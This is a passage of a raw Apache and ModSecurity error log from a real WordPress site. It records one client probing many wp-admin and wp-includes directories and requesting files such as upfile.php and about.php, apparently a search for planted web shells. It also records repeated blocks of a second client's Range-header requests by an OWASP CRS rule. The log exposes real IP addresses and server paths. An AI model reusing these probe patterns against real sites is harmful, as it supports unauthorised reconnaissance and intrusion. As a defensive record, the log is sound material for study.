[client 85.203.21.232:36400] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Mon Feb 17 04:53:09.300102 2025] [autoindex:error] [pid 10664:tid 140634132244224] [client 85.203.21.232:36416] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Mon Feb 17 04:53:13.312765 2025] [autoindex:error] [pid 11230:tid 140634174207744] [client 85.203.21.232:36424] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Mon Feb 17 04:53:18.816181 2025] [autoindex:error] [pid 11230:tid 140634098673408] [client 85.203.21.232:36434] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Mon Feb 17 04:53:20.147818 2025] [autoindex:error] [pid 10664:tid 140634090280704] [client 85.203.21.232:36438] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Mon Feb 17 04:53:23.105739 2025] [:error] [pid 10662:tid 140634274920192] [client 85.203.21.232:36444] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Mon Feb 17 04:54:00.157228 2025] [autoindex:error] [pid 11230:tid 140634354153216] [client 85.203.21.232:37278] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Mon Feb 17 04:54:07.429132 2025] [autoindex:error] [pid 11230:tid 140634174207744] [client 85.203.21.232:37520] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Mon Feb 17 04:54:24.801767 2025] [autoindex:error] [pid 10662:tid 140634207778560] [client 85.203.21.232:37580] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 17 04:54:37.095367 2025] [autoindex:error] [pid 11230:tid 140634123851520] [client 85.203.21.232:37652] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Mon Feb 17 04:54:56.856106 2025] [:error] [pid 10662:tid 140634157422336] [client 85.203.21.232:37700] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Mon Feb 17 04:54:58.284493 2025] [autoindex:error] [pid 10664:tid 140634149029632] [client 85.203.21.232:37712] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Mon Feb 17 04:55:21.728463 2025] [:error] [pid 10664:tid 140634081888000] [client 85.203.21.232:37750] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Feb 17 04:55:45.902148 2025] [:error] [pid 10664:tid 140634132244224] [client 85.203.21.232:37786] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Mon Feb 17 04:56:08.337689 2025] [autoindex:error] [pid 11230:tid 140634224563968] [client 85.203.21.232:37834] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Mon Feb 17 04:57:04.821180 2025] [:error] [pid 11230:tid 140634149029632] [client 85.203.21.232:38006] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Feb 17 10:35:25.121870 2025] [:error] [pid 10662:tid 140634107066112] [client 190.102.150.245:35950] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPf_97XY8xax64gWTiQAAABU"] [Mon Feb 17 10:35:25.236937 2025] [:error] [pid 10663:tid 140634132244224] [client 190.102.150.245:35952] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPbUcx1xj5z0EGUpRdgAAAFI"] [Mon Feb 17 10:35:25.333201 2025] [:error] [pid 10664:tid 140634081888000] [client 190.102.150.245:35954] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPQJrayd7JfpBdXs7lAAAAJg"] [Mon Feb 17 10:35:25.429788 2025] [:error] [pid 10663:tid 140634098673408] [client 190.102.150.245:35956] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPbUcx1xj5z0EGUpRdwAAAFY"] [Mon Feb 17 10:35:25.525335 2025] [:error] [pid 10663:tid 140634115458816] [client 190.102.150.245:35958] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPbUcx1xj5z0EGUpReAAAAFQ"] [Mon Feb 17 10:35:25.619725 2025] [:error] [pid 10663:tid 140634090280704] [client 190.102.150.245:35962] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPbUcx1xj5z0EGUpReQAAAFc"] [Mon Feb 17 10:35:25.716428 2025] [:error] [pid 10663:tid 140634354153216] [client 190.102.150.245:35964] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPbUcx1xj5z0EGUpRegAAAEA"] [Mon Feb 17 10:35:25.813438 2025] [:error] [pid 10663:tid 140634266527488] [client 190.102.150.245:35966] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPbUcx1xj5z0EGUpRewAAAEI"] [Mon Feb 17 10:35:25.910504 2025] [:error] [pid 10663:tid 140634258134784] [client 190.102.150.245:35970] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPbUcx1xj5z0EGUpRfAAAAEM"] [Mon Feb 17 10:35:26.009265 2025] [:error] [pid 10663:tid 140634274920192] [client 190.102.150.245:35974] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPrUcx1xj5z0EGUpRfQAAAEE"] [Mon Feb 17 10:35:26.108659 2025] [:error] [pid 10663:tid 140634207778560] [client 190.102.150.245:35976] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPrUcx1xj5z0EGUpRfgAAAEk"] [Mon Feb 17 10:35:26.206610 2025] [:error] [pid 11230:tid 140634140636928] [client 190.102.150.245:35978] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPqvoDupyaoF2tAucKAAAANE"] [Mon Feb 17 10:35:26.302747 2025] [:error] [pid 11230:tid 140634098673408] [client 190.102.150.245:35980] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPqvoDupyaoF2tAucKQAAANY"] [Mon Feb 17 10:35:26.398794 2025] [:error] [pid 10664:tid 140634199385856] [client 190.102.150.245:35982] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPgJrayd7JfpBdXs7lQAAAIo"] [Mon Feb 17 10:35:26.498307 2025] [:error] [pid 11230:tid 140634224563968] [client 190.102.150.245:35984] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPqvoDupyaoF2tAucKgAAAMc"] [Mon Feb 17 10:35:26.594664 2025] [:error] [pid 11230:tid 140634090280704] [client 190.102.150.245:35986] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPqvoDupyaoF2tAucKwAAANc"] [Mon Feb 17 10:35:26.690876 2025] [:error] [pid 10662:tid 140634258134784] [client 190.102.150.245:35988] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPv_97XY8xax64gWTigAAAAM"] [Mon Feb 17 10:35:26.787442 2025] [:error] [pid 11230:tid 140634241349376] [client 190.102.150.245:35990] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPqvoDupyaoF2tAucLAAAAMU"] [Mon Feb 17 10:35:26.885153 2025] [:error] [pid 11230:tid 140634199385856] [client 190.102.150.245:35992] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPqvoDupyaoF2tAucLQAAAMo"] [Mon Feb 17 10:35:26.981598 2025] [:error] [pid 11230:tid 140634182600448] [client 190.102.150.245:35994] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXPqvoDupyaoF2tAucLgAAAMw"] [Mon Feb 17 10:35:27.077455 2025] [:error] [pid 11230:tid 140634207778560] [client 190.102.150.245:35996] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXP6voDupyaoF2tAucLwAAAMk"] [Mon Feb 17 10:35:27.174109 2025] [:error] [pid 11230:tid 140634165815040] [client 190.102.150.245:35998] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXP6voDupyaoF2tAucMAAAAM4"] [Mon Feb 17 10:35:27.271815 2025] [:error] [pid 11230:tid 140634249742080] [client 190.102.150.245:36000] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXP6voDupyaoF2tAucMQAAAMQ"] [Mon Feb 17 10:35:27.368180 2025] [:error] [pid 11230:tid 140634123851520] [client 190.102.150.245:36002] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXP6voDupyaoF2tAucMgAAANM"] [Mon Feb 17 10:35:27.464310 2025] [:error] [pid 11230:tid 140634258134784] [client 190.102.150.245:36004] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXP6voDupyaoF2tAucMwAAAMM"] [Mon Feb 17 10:35:27.560509 2025] [:error] [pid 11230:tid 140634115458816] [client 190.102.150.245:36006] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXP6voDupyaoF2tAucNAAAANQ"] [Mon Feb 17 10:35:27.657392 2025] [:error] [pid 11230:tid 140634132244224] [client 190.102.150.245:36008] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXP6voDupyaoF2tAucNQAAANI"] [Mon Feb 17 10:35:27.753425 2025] [:error] [pid 11230:tid 140634274920192] [client 190.102.150.245:36010] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXP6voDupyaoF2tAucNgAAAME"] [Mon Feb 17 10:35:27.849962 2025] [:error] [pid 11230:tid 140634098673408] [client 190.102.150.245:36012] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXP6voDupyaoF2tAucNwAAANY"] [Mon Feb 17 10:35:27.947208 2025] [:error] [pid 11230:tid 140634224563968] [client 190.102.150.245:36014] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXP6voDupyaoF2tAucOAAAAMc"] [Mon Feb 17 10:35:28.044397 2025] [:error] [pid 11230:tid 140634090280704] [client 190.102.150.245:36016] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQKvoDupyaoF2tAucOQAAANc"] [Mon Feb 17 10:35:28.141914 2025] [:error] [pid 10663:tid 140634224563968] [client 190.102.150.245:36018] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data 